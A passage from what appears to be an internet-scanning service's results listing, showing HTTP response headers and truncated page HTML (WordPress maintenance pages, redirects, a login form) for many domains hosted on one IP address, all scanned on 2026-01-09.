    			<header>
    				<div class="logo-box istext" rel="home"><h1 class="site-title"></h1></div>			</header>
    		</div>
    		<div id="content" class="site-content">
    			<div class="center">
                    <h2 class="heading font-center" style="font-weight:300;font-style:normal">Maintenance mode is on</h2><div class="description" style="font-weight:300;font-style:normal"><p>Site will be available soon. Thank you for your patience!</p>
    </div>			</div>
    		</div>
    	</div> <!-- end wrapper -->
    	<footer>
    		<div class="center">
    			<div style="font-weight:300;font-style:normal">© 2025</div>		</div>
    	</footer>
    					<picture class="bg-img">
    						<img class="skip-lazy" src="https://flamecharismatic.org.uk/wp-content/uploads/2025/10/mt-sample-background.jpg">
    		</picture>
    	</div>
    
    	<div class="login-form-container">
    		<input type="hidden" id="mtnc_login_check" name="mtnc_login_check" value="7a63bdaaed" /><input type="hidden" name="_wp_http_referer" value="/" /><form id="login-form" class="login-form" method="post"><label>User Login</label><span class="login-error"></span><span class="licon user-icon"><input type="text" name="log" id="log" value="" size="20" class="input username" placeholder="Username" /></span><span class="picon pass-icon"><input type="password" name="pwd" id="login_password" value="" size="20" class="input password" placeholder="Password" /></span><a class="lost-pass" href="https://flamecharismatic.org.uk/wp-login.php?action=lostpassword">Lost Password</a><input type="submit" class="button" name="submit" id="submit" value="Login" /><input type="hidden" name="is_custom
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.menarapool.com

    2026-01-09 15:49

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Fri, 09 Jan 2026 15:49:11 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.menarapool.com/cgi-sys/suspendedpage.cgi
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.walchakpouredwalls.com

    2026-01-09 15:45

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://walchakpouredwalls.com/
    content-length: 0
    date: Fri, 09 Jan 2026 15:45:12 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.us.mealbox.online

    2026-01-09 15:23

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://us.mealbox.online/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 09 Jan 2026 15:23:29 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.webmoo.net

    2026-01-09 15:12

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    x-redirect-by: WordPress
    location: https://webmoo.net/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 09 Jan 2026 15:12:10 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · slotspin88.com

    2026-01-09 14:54

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    link: <https://slotspin88.com/wp-json/>; rel="https://api.w.org/"
    link: <https://slotspin88.com/wp-json/wp/v2/pages/106>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://slotspin88.com/>; rel=shortlink
    content-type: text/html; charset=utf-8
    server-timing: amp_sanitizer;dur="49.9",amp_style_sanitizer;dur="12.0",amp_tag_and_attribute_sanitizer;dur="24.3",amp_optimizer;dur="34.2"
    etag: "3647-1767806809;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 09 Jan 2026 14:54:37 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · store.goyam.online

    2026-01-09 14:42

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://store.goyam.online/wp-json/>; rel="https://api.w.org/"
    etag: "779-1767960157;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 09 Jan 2026 14:42:15 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.goodybuy.xyz

    2026-01-09 14:35

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://goodybuy.xyz/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 09 Jan 2026 14:35:57 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · shunslab.com

    2026-01-09 14:35

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Fri, 09 Jan 2026 14:35:12 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.jadecare.co.uk

    2026-01-09 14:16

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache; private
    content-length: 6368
    date: Fri, 09 Jan 2026 14:16:38 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: My Blog
    
    <!DOCTYPE html>
    
    <html lang="en-US">
        <head>
        	<meta charset="UTF-8">
        	<meta name="viewport" content="width=device-width, initial-scale=1">
    
            <!-- SEO -->
    <title>My Blog</title><meta name="description" content="My WordPress Blog"/>
    <!-- og meta for facebook, googleplus -->
    <meta property="og:title" content="My Blog"/>
    <meta property="og:description" content="My WordPress Blog"/>
    <meta property="og:url" content="https://jadecare.co.uk"/>
    <meta property="og:type" content="website" />
    <meta property="og:image" content="https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2-1024x576.jpg"/>
    
    <!-- twitter meta -->
    <meta name="twitter:card" content="summary_large_image"/>
    <meta name="twitter:title" content="My Blog"/>
    <meta name="twitter:description" content="My WordPress Blog"/>
    <meta name="twitter:url" content="https://jadecare.co.uk"/>
    <meta name="twitter:image" content="https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2-1024x576.jpg"/>
    
    <link rel="stylesheet" href="https://jadecare.co.uk/wp-content/plugins/cmp-coming-soon-maintenance/themes/hardwork/style.css?v=4.1.15" type="text/css" media="all">
    <link rel="stylesheet" href="https://jadecare.co.uk/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" rel="stylesheet" >
    <link href="https://fonts.googleapis.com/css?family=Playfair+Display:700%7CMontserrat:400,700,400&amp;subset=latin-ext,cyrillic,latin,vietnamese,cyrillic-ext" rel="stylesheet">
    
    
            <style>
                body,input {font-family:'Montserrat', 'sans-serif';color:#ffffff;}
                                .social-list {background-color: rgba(0,0,0,0.4);}
                                a {color:#ffffff;}
                h1,h2,h3,h4,h5,h6 {font-family:'Playfair Display', 'sans-serif';}
                body {font-size:17px; letter-spacing: 0px; font-weight:400;; }
                h1:not(.text-logo),h2, h3,h4,h5,h6,.text-logo-wrapper {font-size:2.3529411764706em;letter-spacing: 0px; font-weight:700;font-style: normal;; }
                h1 {font-weight:700;font-style: normal;;}
            </style>
    
            
    
    <style>
        .wp-video {margin: 0 auto;}
        .wp-video-shortcode {max-width: 100%;}
        .grecaptcha-badge {display: none!important;}
        .text-logo {display: inline-block;}
        #gdpr-checkbox {-webkit-appearance: checkbox;-moz-appearance: checkbox;width: initial;height: initial;}
        #counter.expired {display: none; }
        input, button {
            box-shadow: inset 0 0 0 0 !important;
            -webkit-box-shadow: inset 0 0 0 0 !important;
            -webkit-appearance: none;
            outline: none;
        }
    </style>
    
    
    
    
        </head>
    
    
        <body id="body">
            <div id="background-wrapper">
    
             <div id="background-image" class="image" style="background-image:url('https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2.jpg')"></div>
            </div>
    
            
            <section class="section section-body">
                         
             </section>
            
        <!-- Fade in background image after load -->
        <script>
            window.addEventListener("load",function(event) {
                init();
            });
    
            function init(){
    
                var image = document.getElementById('background-image');
                var body = document.getElementById('body');
                
                if ( image === null ) {
                    image = document.getElementById('body');
                } 
    
                if ( image != null ) {
                    if ( image.className !== 'image-unsplash') {
                        image.classList.add('loaded');
                        body.classList.add('loaded');
                    }
                }
    
                        }
        </script>
    
        
        <script>
            /* Subscribe form script */
            var ajaxWpUrl = 'https://jadecare.co.uk/wp-admin/admin-ajax.php';
            var {pathname} = new URL(ajaxWpUrl);
            var ajaxurl = `${location.protocol}//${location.hostname}${pathname}`;
            var
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.redarkgroup.com

    2026-01-09 14:11

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    x-powered-by: PHP/8.4.15
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://redarkgroup.com/
    content-length: 0
    date: Fri, 09 Jan 2026 14:11:44 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.blobby.me

    2026-01-09 14:06

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://blobby.me/
    x-litespeed-cache: hit
    content-length: 0
    date: Fri, 09 Jan 2026 14:06:16 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.goseguros.devdecimosite2025.com

    2026-01-09 13:58

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://goseguros.devdecimosite2025.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 09 Jan 2026 13:58:17 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.atrixio.co.uk

    2026-01-09 13:54

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    x-redirect-by: WordPress
    location: https://atrixio.co.uk/
    cache-control: public, max-age=0
    expires: Fri, 09 Jan 2026 13:54:38 GMT
    content-length: 0
    date: Fri, 09 Jan 2026 13:54:38 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · blog.jobrh.com

    2026-01-09 13:48

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://blog.jobrh.com/index.php?rest_route=/>; rel="https://api.w.org/"
    link: <https://blog.jobrh.com/index.php?rest_route=/wp/v2/pages/15>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://blog.jobrh.com/>; rel=shortlink
    transfer-encoding: chunked
    date: Fri, 09 Jan 2026 13:48:58 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · blobby.me

    2026-01-09 13:34

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://blobby.me/wp-json/>; rel="https://api.w.org/"
    link: <https://blobby.me/wp-json/wp/v2/pages/9>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://blobby.me/>; rel=shortlink
    etag: "1073-1767760605;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 09 Jan 2026 13:34:53 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.shunslab.com

    2026-01-09 13:32

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Fri, 09 Jan 2026 13:32:23 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · metatonix.com

    2026-01-09 13:23

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Fri, 09 Jan 2026 13:23:54 GMT
    server: LiteSpeed
    location: https://metatonix.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · metatonix.com

    2026-01-09 13:23

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://metatonix.com/wp-json/>; rel="https://api.w.org/"
    link: <https://metatonix.com/wp-json/wp/v2/pages/167>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://metatonix.com/>; rel=shortlink
    etag: "147-1767873813;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 09 Jan 2026 13:23:54 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.walchaksurfacecoatings.com

    2026-01-09 12:23

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://walchaksurfacecoatings.com/
    content-length: 0
    date: Fri, 09 Jan 2026 12:23:41 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.hmq.devdecimosite2025.com

    2026-01-09 12:04

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://hmq.devdecimosite2025.com/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 09 Jan 2026 12:04:37 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · rwd.ae

    2026-01-09 12:01

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://www.rwd.ae/
    content-length: 0
    date: Fri, 09 Jan 2026 12:01:59 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · petunia.lol

    2026-01-09 11:44

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://petunia.lol/index.php?rest_route=/>; rel="https://api.w.org/"
    link: <https://petunia.lol/index.php?rest_route=/wp/v2/pages/7>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://petunia.lol/>; rel=shortlink
    transfer-encoding: chunked
    date: Fri, 09 Jan 2026 11:44:22 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · jadecare.co.uk

    2026-01-09 10:52

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache; private
    content-length: 6368
    date: Fri, 09 Jan 2026 10:52:34 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: My Blog
    
    <!DOCTYPE html>
    
    <html lang="en-US">
        <head>
        	<meta charset="UTF-8">
        	<meta name="viewport" content="width=device-width, initial-scale=1">
    
            <!-- SEO -->
    <title>My Blog</title><meta name="description" content="My WordPress Blog"/>
    <!-- og meta for facebook, googleplus -->
    <meta property="og:title" content="My Blog"/>
    <meta property="og:description" content="My WordPress Blog"/>
    <meta property="og:url" content="https://jadecare.co.uk"/>
    <meta property="og:type" content="website" />
    <meta property="og:image" content="https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2-1024x576.jpg"/>
    
    <!-- twitter meta -->
    <meta name="twitter:card" content="summary_large_image"/>
    <meta name="twitter:title" content="My Blog"/>
    <meta name="twitter:description" content="My WordPress Blog"/>
    <meta name="twitter:url" content="https://jadecare.co.uk"/>
    <meta name="twitter:image" content="https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2-1024x576.jpg"/>
    
    <link rel="stylesheet" href="https://jadecare.co.uk/wp-content/plugins/cmp-coming-soon-maintenance/themes/hardwork/style.css?v=4.1.15" type="text/css" media="all">
    <link rel="stylesheet" href="https://jadecare.co.uk/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" rel="stylesheet" >
    <link href="https://fonts.googleapis.com/css?family=Playfair+Display:700%7CMontserrat:400,700,400&amp;subset=latin-ext,cyrillic,latin,vietnamese,cyrillic-ext" rel="stylesheet">
    
    
            <style>
                body,input {font-family:'Montserrat', 'sans-serif';color:#ffffff;}
                                .social-list {background-color: rgba(0,0,0,0.4);}
                                a {color:#ffffff;}
                h1,h2,h3,h4,h5,h6 {font-family:'Playfair Display', 'sans-serif';}
                body {font-size:17px; letter-spacing: 0px; font-weight:400;; }
                h1:not(.text-logo),h2, h3,h4,h5,h6,.text-logo-wrapper {font-size:2.3529411764706em;letter-spacing: 0px; font-weight:700;font-style: normal;; }
                h1 {font-weight:700;font-style: normal;;}
            </style>
    
            
    
    <style>
        .wp-video {margin: 0 auto;}
        .wp-video-shortcode {max-width: 100%;}
        .grecaptcha-badge {display: none!important;}
        .text-logo {display: inline-block;}
        #gdpr-checkbox {-webkit-appearance: checkbox;-moz-appearance: checkbox;width: initial;height: initial;}
        #counter.expired {display: none; }
        input, button {
            box-shadow: inset 0 0 0 0 !important;
            -webkit-box-shadow: inset 0 0 0 0 !important;
            -webkit-appearance: none;
            outline: none;
        }
    </style>
    
    
    
    
        </head>
    
    
        <body id="body">
            <div id="background-wrapper">
    
             <div id="background-image" class="image" style="background-image:url('https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2.jpg')"></div>
            </div>
    
            
            <section class="section section-body">
                         
             </section>
            
        <!-- Fade in background image after load -->
        <script>
            window.addEventListener("load",function(event) {
                init();
            });
    
            function init(){
    
                var image = document.getElementById('background-image');
                var body = document.getElementById('body');
                
                if ( image === null ) {
                    image = document.getElementById('body');
                } 
    
                if ( image != null ) {
                    if ( image.className !== 'image-unsplash') {
                        image.classList.add('loaded');
                        body.classList.add('loaded');
                    }
                }
    
                        }
        </script>
    
        
        <script>
            /* Subscribe form script */
            var ajaxWpUrl = 'https://jadecare.co.uk/wp-admin/admin-ajax.php';
            var {pathname} = new URL(ajaxWpUrl);
            var ajaxurl = `${location.protocol}//${location.hostname}${pathname}`;
            var
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · open-iptv.net

    2026-01-09 10:30

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://open-iptv.net/wp-json/>; rel="https://api.w.org/"
    etag: "11016-1767664776;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 09 Jan 2026 10:30:48 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.slotspin88.com

    2026-01-09 09:57

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://slotspin88.com/
    server-timing: 
    x-litespeed-cache: hit
    content-length: 0
    date: Fri, 09 Jan 2026 09:57:35 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · videoeditorusa.com

    2026-01-09 09:57

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://videoeditorusa.com/wp-json/>; rel="https://api.w.org/"
    link: <https://videoeditorusa.com/wp-json/wp/v2/pages/25>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://videoeditorusa.com/>; rel=shortlink
    etag: "1333-1767787916;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 09 Jan 2026 09:57:03 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.moyo.goodybuy.xyz

    2026-01-09 09:46

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://moyo.goodybuy.xyz/
    x-litespeed-cache: hit
    content-length: 0
    date: Fri, 09 Jan 2026 09:46:12 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.telefonoip.cl

    2026-01-09 09:28

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://www.telefonoip.cl/wp-json/>; rel="https://api.w.org/"
    content-length: 58648
    date: Fri, 09 Jan 2026 09:28:21 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Telefono IP - Voz sobre IP desde tu computador
    
    <!DOCTYPE html>
    <html lang="en">
        <head>
            <meta charset="utf-8">
            <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
            
            <!-- SEO Meta Tags -->
            <meta name="description" content="Your description">
            <meta name="author" content="Your name">
    
            <!-- OG Meta Tags to improve the way the post looks when you share the page on Facebook, Twitter, LinkedIn -->
            <meta property="og:site_name" content="" /> <!-- website name -->
            <meta property="og:site" content="" /> <!-- website link -->
            <meta property="og:title" content=""/> <!-- title shown in the actual shared post -->
            <meta property="og:description" content="" /> <!-- description shown in the actual shared post -->
            <meta property="og:image" content="" /> <!-- image link, make sure it's jpg -->
            <meta property="og:url" content="" /> <!-- where do you want your post to link to -->
            <meta name="twitter:card" content="summary_large_image"> <!-- to have large image post format in Twitter -->
            
            <link href="data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAACXBIWXMAAAsTAAALEwEAmpwYAAADFElEQVR4nLVXS08TURSerWjciOLf8LV2YYR7SzEsADWyciU+FqwQMXFrjLpHIveWisqQc6FFmhA0mIBGIQEsWASk5S2+Ivjc9ZozdIZ2OjPtdMpJvjSZ3sn33fMeRXFpPqYe9jEghME1wqEJQbm4is+q2kJlym4YeageJEy0ECamKBfSCYRDlHK4ge94Jj7dMbA3dcPNXMRZYPCbMnGbBCP7C7t1O5ygTKy4Js4CLFfynmPuyJmoJRz+eCc38I9wUZ8nOZyjDJJFJNdDkvRxUedIXtEOR803PxPslQ/GJuWjd9Py7NNnnkQQJv5iaG0Tjppi7u/olX2zczKx9V3D6NqqPN/V700EF4v+1nBJtuu5uGUm75+bN8h1vFlFEZ490WK6PRwiHH6mH7r/eiyLXMfw8pL0BXq85MNWRp+o4OKm+RDEPtgKQNQ96fPqheuGAMrEtPnAneG3tuQ9M7PFqIxJjRx7u1XZVQd75dSXT1nkkfmPWmV4FsAgiaFXKBfU7tDdkdEM8ufxeHHIdyqiXKEMrtgdwErA0tMFiFhRXL8jIACXFZxcToca+4dkPCUAfy+FBospojmnAET7eNTwwsjKkqwqXhiaHUOgA+OOta+LUN/PSJ/NWXxer0ZkZR59gnDR4JiE6cDuN76xniHC7AkUGk617peLi7LmcV/uJKxqC5XlO/0uigEZ+/Y5IxwNqZxAcnPrxv9tRTBIGt1we43KL24oIt0T8VR1vIgnLJsWiqi1EEE4TKQvIC1ukgcnYnpO5AKfjFoJaDIE+DvDpTgg3IhAl7PxqFGiTsB9wvT+5qmAOJC5jFgMpHzQGBmSo+trtuSDCwtaW7cdRBkLCYflQkRgx7z3akxOfd3ISU45JGpVdY9iZSTQfURbpwtrKrI6GNKmaNd0TNsnzGWKKxkNdB9XnMzHRd1uLaWEQ40j+a6u5QwuKG6sAjdkJpa8k0MCQ6sUYv7WcEnqA/SHe5eLX/hpdlJV9xVErqQL6QyXYungGuWYH9txnkDR+I5nYivb3qBFOS4T+uc5TjV8pq1YLu0/S9qBd1msahUAAAAASUVORK5CYII=" rel="icon" type="image/x-icon">
            <!-- Styles -->
            <link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,400;0,600;0,700;1,400&display=swap" rel="stylesheet">
            <link href="https://www.telefonoip.cl/wp-content/themes/zinc/css/bootstrap.min.css" rel="stylesheet">
            <link href="https://www.telefonoip.cl/wp-content/themes/zinc/css/fontawesome-all.min.css" rel="stylesheet">
            <link href="https://www.telefonoip.cl/wp-content/themes/zinc/css/swiper.css" rel="stylesheet">
            <link href="https://www.telefonoip.cl/wp-content/themes/zinc/style.css" rel="stylesheet">
    
            <script>
            const template_uri = 'https://www.telefonoip.cl/wp-content/themes/zinc';
            </script>
    
            <!-- Google tag (gtag.js) -->
            <script async src="https://www.googletagmanager.com/gtag/js?id=G-VGP6S943T1"></script>
            <script>
              window.dataLayer = window.dataLayer || [];
              function gtag(){dataLayer.push(arguments);}
              gtag('js', new Date());
    
              gtag('config', 'G-VGP6S943T1');
            </script>
    
            <!-- Google Tag Manager -->
            <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
            new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
            j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
            'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
            })(window,document,'script','dataLayer','GTM-KDT6HPT9');</script>
            <!-- End Google Tag Manager -->
            
            <!-- Favicon  -->
            <link rel="icon" href="images/favicon.png">
    
            <meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />
    
    	<!-- This site is optimize
    Found 2026-01-09 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.videoeditorusa.com

    2026-01-09 09:23

    HTTP/1.1 301 Moved Permanently
